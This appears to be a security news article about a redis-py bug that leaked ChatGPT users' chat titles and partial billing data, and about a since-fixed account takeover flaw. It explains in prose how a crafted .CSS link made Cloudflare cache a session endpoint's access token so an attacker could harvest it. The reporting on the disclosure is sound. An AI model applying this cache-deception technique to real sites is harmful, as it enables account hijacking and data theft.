[![ChatGPT](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)]()
OpenAI on Friday disclosed that a bug in the Redis open source library was responsible for the exposure of other users’ personal information and chat titles in the upstart’s ChatGPT service earlier this week.
The [glitch](), which came to light on March 20, 2023, enabled certain users to view brief descriptions of other users’ conversations from the chat history sidebar, prompting the company to temporarily shut down the chatbot.
“It’s also possible that the first message of a newly-created conversation was visible in someone else’s chat history if both users were active around the same time,” the company [said]().
The bug, it further added, originated in the [redis-py library](), leading to a scenario where canceled requests could cause connections to be corrupted and return unexpected data from the database cache, in this case, information belonging to an unrelated user.
To make matters worse, the San Francisco-based AI research company said it introduced a server-side change by mistake that led to a surge in request cancellations, thereby upping the error rate.
While the problem has since been addressed, OpenAI noted that the issue may have had more implications elsewhere, potentially revealing payment-related information of 1.2% of the ChatGPT Plus subscribers on March 20 between 1-10 a.m. PT.
This included another active user’s first and last name, email address, payment address, the last four digits (only) of a credit card number, and credit card expiration date. It emphasized that full credit card numbers were not exposed.
The company said it has reached out to affected users to notify them of the inadvertent leak. It also said it “added redundant checks to ensure the data returned by our Redis cache matches the requesting user.”
## **OpenAI Fixes Critical Account Takeover Flaw**
In another caching-related issue, the company also addressed a critical account takeover vulnerability that could be exploited to seize control of another user’s account, view their chat history, and access billing information without their knowledge.
The flaw, which was [discovered]() by security researcher Gal Nagli, bypasses protections put in place by OpenAI on chat.openai[.]com to read a victim’s sensitive data.
[![ChatGPT Account Takeover](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)]()
This is achieved by first creating a specially crafted link that appends a .CSS resource to the “chat.openai[.]com/api/auth/session/” endpoint and tricking a victim to click on the link, causing the response containing a JSON object with the accessToken string to be cached in [Cloudflare’s CDN]().
The cached response to the CSS resource (which has the [CF-Cache-Status header]() value set to HIT) is then abused by the attacker to harvest the target’s JSON Web Token ([JWT]()) credentials and take over the account.
Nagli said the bug was fixed by OpenAI within two hours of responsible disclosure, indicative of the severity of the issue.
Found this article interesting? Follow us on [Twitter _ï_]() and [LinkedIn]() to read more exclusive content we post.Read More